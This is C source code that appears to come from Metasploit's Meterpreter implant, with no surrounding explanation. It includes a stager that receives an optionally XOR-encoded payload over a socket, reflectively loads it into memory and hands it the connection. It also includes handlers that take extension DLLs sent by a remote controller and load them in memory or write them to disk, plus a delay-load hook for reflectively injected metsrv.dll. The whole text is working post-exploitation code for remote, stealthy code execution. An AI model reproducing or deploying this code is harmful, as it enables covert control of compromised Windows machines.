FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli )
{
switch( dliNotify )
{
case dliNotePreLoadLibrary:
// If we are trying to delay load metsrv.dll we can just return the
// HMODULE of the injected metsrv library (set in InitServerExtension).
if( strcmp( pdli->szDll, "metsrv.dll" ) == 0 )
return (FARPROC)hMetSrv;
break;
case dliNotePreGetProcAddress:
// If we are trying to get the address of an exported function in the
// metsrv.dll we must use GetProcAddressR() in case the metsrv was loaded
// via reflective dll injection
if( strcmp( pdli->szDll, "metsrv.dll" ) == 0 )
return GetProcAddressR( pdli->hmodCur, pdli->dlp.szProcName );
break;
default:
return NULL;
}
return NULL;
}
DWORD WINAPI handleclient(LPVOID clientsocket){
int response = 0;
int total = 0;
char *payload;
char recvbuf[1024];
DWORD payloadlength = 0;
HMODULE loadedfile = NULL;
if(initwsa() != 0){
exit(0);
}
response = recv((int)clientsocket, (char *)&payloadlength, sizeof(DWORD), 0);
payload = (char *)malloc(payloadlength);
memset(payload,0,payloadlength);
memset(recvbuf,0,1024);
do{
response = recv((int)clientsocket, recvbuf, 1024, 0);
if(USEXOR){
xor(&recvbuf[0],response);
}
memcpy(payload,recvbuf,response);
payload += response;
total += response;
payloadlength -= response;
}while(payloadlength > 0);
payload -= total;
loadedfile = LoadLibraryR(payload,total);
meterpreterstart = (MyInit) GetProcAddressR(loadedfile,"Init");
meterpreterstart((int)clientsocket);
free(payload);
}
DWORD load_extension(HMODULE hLibrary, BOOL bLibLoadedReflectivly, Remote* pRemote, Packet* pResponse, Command* pFirstCommand)
{
DWORD dwResult = ERROR_OUTOFMEMORY;
PEXTENSION pExtension = (PEXTENSION)malloc(sizeof(EXTENSION));
dprintf("[SERVER] Initialising extension %x", hLibrary);
if (pExtension)
{
memset(pExtension, 0, sizeof(EXTENSION));
pExtension->library = hLibrary;
// if the library was loaded via its reflective loader we must use GetProcAddressR()
if (bLibLoadedReflectivly)
{
pExtension->init = (PSRVINIT)GetProcAddressR(pExtension->library, "InitServerExtension");
pExtension->deinit = (PSRVDEINIT)GetProcAddressR(pExtension->library, "DeinitServerExtension");
pExtension->getname = (PSRVGETNAME)GetProcAddressR(pExtension->library, "GetExtensionName");
pExtension->commandAdded = (PCMDADDED)GetProcAddressR(pExtension->library, "CommandAdded");
pExtension->stagelessInit = (PSTAGELESSINIT)GetProcAddressR(pExtension->library, "StagelessInit");
}
else
{
pExtension->init = (PSRVINIT)GetProcAddress(pExtension->library, "InitServerExtension");
pExtension->deinit = (PSRVDEINIT)GetProcAddress(pExtension->library, "DeinitServerExtension");
pExtension->getname = (PSRVGETNAME)GetProcAddress(pExtension->library, "GetExtensionName");
pExtension->commandAdded = (PCMDADDED)GetProcAddress(pExtension->library, "CommandAdded");
pExtension->stagelessInit = (PSTAGELESSINIT)GetProcAddress(pExtension->library, "StagelessInit");
}
// patch in the metsrv.dll's HMODULE handle, used by the server extensions for delay loading
// functions from the metsrv.dll library. We need to do it this way as LoadLibrary/GetProcAddress
// wont work if we have used Reflective DLL Injection as metsrv.dll will be 'invisible' to these functions.
if (pRemote)
{
pRemote->met_srv = hAppInstance;
}
dprintf("[SERVER] Calling init on extension, address is 0x%p", pExtension->init);
// Call the init routine in the library
if (pExtension->init)
{
dprintf("[SERVER] Calling init()...");
pExtension->end = pFirstCommand;
dwResult = pExtension->init(pRemote);
pExtension->start = extensionCommands;
if (dwResult == ERROR_SUCCESS)
{
// inform the new extension of the existing commands
if (pExtension->commandAdded)
{
for (Command* command = pExtension->end; command != NULL; command = command->next)
{
pExtension->commandAdded(command->method);
}
}
if (pExtension->getname)
{
pExtension->getname(pExtension->name, sizeof(pExtension->name));
}
list_push(gExtensionList, pExtension);
}
else
{
free(pExtension);
}
}
dprintf("[SERVER] Called init()...");
if (pResponse)
{
for (Command* command = pExtension->start; command != pExtension->end; command = command->next)
{
packet_add_tlv_string(pResponse, TLV_TYPE_METHOD, command->method);
// inform existing extensions of the new commands
for (PNODE node = gExtensionList->start; node != NULL; node = node->next)
{
PEXTENSION ext = (PEXTENSION)node->data;
// don't inform the extension of itself
if (ext != pExtension && ext->commandAdded)
{
ext->commandAdded(command->method);
}
}
}
}
}
return dwResult;
}
DWORD request_core_loadlib(Remote *remote, Packet *packet)
{
Packet *response = packet_create_response(packet);
DWORD res = ERROR_SUCCESS;
HMODULE library;
PCHAR libraryPath;
DWORD flags = 0;
BOOL bLibLoadedReflectivly = FALSE;
Command *first = extensionCommands;
Command *command;
do
{
libraryPath = packet_get_tlv_value_string(packet, TLV_TYPE_LIBRARY_PATH);
flags = packet_get_tlv_value_uint(packet, TLV_TYPE_FLAGS);
// Invalid library path?
if (!libraryPath)
{
res = ERROR_INVALID_PARAMETER;
break;
}
// If the lib does not exist locally, but is being uploaded...
if (!(flags & LOAD_LIBRARY_FLAG_LOCAL))
{
PCHAR targetPath;
Tlv dataTlv;
// Get the library's file contents
if ((packet_get_tlv(packet, TLV_TYPE_DATA,
&dataTlv) != ERROR_SUCCESS) ||
(!(targetPath = packet_get_tlv_value_string(packet,
TLV_TYPE_TARGET_PATH))))
{
res = ERROR_INVALID_PARAMETER;
break;
}
// If the library is not to be stored on disk,
if (!(flags & LOAD_LIBRARY_FLAG_ON_DISK))
{
// try to load the library via its reflective loader...
library = LoadLibraryR(dataTlv.buffer, dataTlv.header.length);
if (library == NULL)
{
// if that fails, presumably besause the library doesn't support
// reflective injection, we default to using libloader...
library = libloader_load_library(targetPath,
dataTlv.buffer, dataTlv.header.length);
}
else
{
bLibLoadedReflectivly = TRUE;
}
res = (library) ? ERROR_SUCCESS : ERROR_NOT_FOUND;
}
else
{
// Otherwise, save the library buffer to disk
res = buffer_to_file(targetPath, dataTlv.buffer,
dataTlv.header.length);
}
// Override the library path
libraryPath = targetPath;
}
// If a previous operation failed, break out.
if (res != ERROR_SUCCESS)
break;
// Load the library
if ((!library) && (!(library = LoadLibrary(libraryPath))))
res = GetLastError();
else
res = ERROR_SUCCESS;
// If this library is supposed to be an extension library, try to
// call its Init routine
if ((flags & LOAD_LIBRARY_FLAG_EXTENSION) && (library))
{
EXTENSION * extension = (EXTENSION *)malloc(sizeof(EXTENSION));
if (extension)
{
extension->library = library;
// if the library was loaded via its reflective loader we must use GetProcAddressR()
if (bLibLoadedReflectivly)
{
extension->init = (PSRVINIT)GetProcAddressR(extension->library, "InitServerExtension");
extension->deinit = (PSRVDEINIT)GetProcAddressR(extension->library, "DeinitServerExtension");
}
else
{
extension->init = (PSRVINIT)GetProcAddress(extension->library, "InitServerExtension");
extension->deinit = (PSRVDEINIT)GetProcAddress(extension->library, "DeinitServerExtension");
}
// patch in the metsrv.dll's HMODULE handle, used by the server extensions for delay loading
// functions from the metsrv.dll library. We need to do it this way as LoadLibrary/GetProcAddress
// wont work if we have used Reflective DLL Injection as metsrv.dll will be 'invisible' to these functions.
remote->hMetSrv = hAppInstance;
// Call the init routine in the library
if (extension->init)
{
dprintf("[SERVER] Calling init()...");
res = extension->init(remote);
if (res == ERROR_SUCCESS)
{
list_push(extension_list, extension);
}
else
{
free(extension);
}
}
dprintf("[SERVER] Called init()...");
if (response)
{
for (command = extensionCommands; command != first; command = command->next)
{
packet_add_tlv_string(response, TLV_TYPE_METHOD, command->method);
}
}
}
}
} while (0);
if (response)
{
packet_add_tlv_uint(response, TLV_TYPE_RESULT, res);
packet_transmit(remote, response, NULL);
}
return res;
}